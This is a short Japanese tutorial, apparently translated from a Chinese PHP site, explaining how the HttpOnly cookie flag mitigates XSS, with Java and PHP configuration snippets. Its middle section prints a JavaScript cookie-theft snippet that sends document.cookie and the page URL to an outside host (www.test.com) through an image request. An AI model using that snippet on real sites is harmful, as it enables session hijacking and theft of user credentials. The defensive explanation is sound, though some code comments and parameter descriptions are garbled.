PHP は httponly を使用して XSS 攻撃を防止します

1. HttpOnlyとは何ですか?
   
   cookieにHttpOnly属性を設定すると、jsスクリプトを介してCookie情報が読み取られなくなり、XSS攻撃を効果的に防ぐことができます。詳しくは、Googleで検索してください。

2. JavaEE の API はサポートされていますか?

現在、Sun は関連する API を発表していませんが、PHP と C# はそれを実装しています。 javaEEに取り組んでいる兄弟はかなり落ち込んでいますが、心配しないでください、以下に回避策があります

3. HttpOnlyの設定例

javaEE
response.setHeader("Set-Cookie", "cookiename=value;
Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly");

この記事では主に、xss攻撃を防ぐためにhttponlyを使用したPHPのxss防御を紹介します。 PHP メソッドで HttpOnly の設定を行うと、必要な友人がそれを参照できます

言うまでもなく、xss の概念は非常に有害です。つまり、Web サイトに xss の脆弱性が現れると、任意の js コードを実行できてしまうのが最も恐ろしいことです。つまり、攻撃者は js を使用して cookie や sessionhijack を取得し、それに多くの機密情報 (ID 情報、管理者情報) などが含まれていれば終わりです。 。 。

次の js は Cookie 情報を取得するために使用されます:

コードは次のとおりです:

url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;

一般に、Cookie を設定するとき、ブラウザは通常、HttpOnly と呼ばれるパラメータを受け入れます。ドメインと他のパラメータは同じです。この HttpOnly が設定されると、ブラウザのドキュメント オブジェクトに Cookie が表示されなくなります。
PHP 設定 HttpOnly
:

<strong>//在php.ini中，session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);

//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);</strong>

PHP5.1 パスより前の PHP バージョンの場合:

header("Set-Cookie: hidden=value; httpOnly");

最後に、HttpOnly は万能薬ではありません。

以上がPHP は httponly を使用して XSS 攻撃を防止しますの詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。